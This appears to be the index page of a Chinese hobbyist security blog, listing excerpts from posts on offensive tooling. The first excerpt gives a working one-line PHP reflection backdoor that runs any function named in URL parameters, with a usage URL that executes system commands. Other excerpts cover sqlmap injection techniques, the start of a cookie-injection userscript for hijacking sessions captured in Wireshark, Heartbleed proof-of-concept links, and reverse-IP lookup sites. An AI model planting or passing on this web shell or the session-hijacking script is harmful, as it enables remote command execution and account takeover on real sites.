Php反射后门

<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?> 用法:http://localhost/fs.php?m=system&c=whoami (园长博客看见,试验了一下,存个档..)

阅读全文>>

Wdcp start&stop

用wdcp感觉有种分分钟被黑的节奏..(因为还不会linux,它比较傻瓜化,所以先用着吧.) 听说关闭wdcp并不影响web,本想设置一个401,奈何不知道具体咋设置,.htaccess不知道往哪建..(轻喷) 关闭和开启wdcp,记录以备用 /etc...

阅读全文>>

OverApi

程序猿: overapi.com 一网打尽了各种各样的语言的API和参考手册(Cheat Sheet)。即使经验丰富,天赋过人,也不得不承认,记得所有的东西这并不在人类的能力范围之内,可喜的是,我们可以通过别的途径实现:http://overapi.com/

阅读全文>>

直接在电脑上下载Google Play的应用

由于Google已退出中国市场,导致国内的手机已经默认“阉割”了Google商店。 当然,我们可以手动安装上它,不过会比较麻烦,可能会出现各种问题。 (反正我不打算安装了。。) 这里推荐一个简单办法,可以直接从Google Pla...

阅读全文>>

sqlmap helper

当给sqlmap一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返...

阅读全文>>

GreaseMonkey of Cookie Injector

Cookie Inject的脚本,留个备用 cookie.zip // ==UserScript== // @name Cookie Injector // @namespace BearsWithWings // @description Inject Cookie String From Wireshark Dump Into Any Webpage // @version 2.0.1 // @include * // @exclude https?://gmail...

阅读全文>>

ssl test poc

     http://filippo.io/Heartbleed/ (An online test for exposure to Heartbleed) and https://github.com/FiloSottile/Heartbleed (The codebase the @filippoindicates is running on the site)     http://pastebin.com/WmxzjkXJ (ssltest.py)   &nbs...

阅读全文>>

Web Test

阅读全文>>

Find ip website

http://www.sitedossier.com http://www.bing.com/search?q=IP:127.0.0.1 http://bgp.he.net/net/127.0.0.1/17#_dns http://hosts-file.net/?s=127.0.0.1&view=history&direct=1 http://whois.domaintools.com/127.0.0.1 http://www.tcpiputils.com/ 记录几个查询C段的站~

阅读全文>>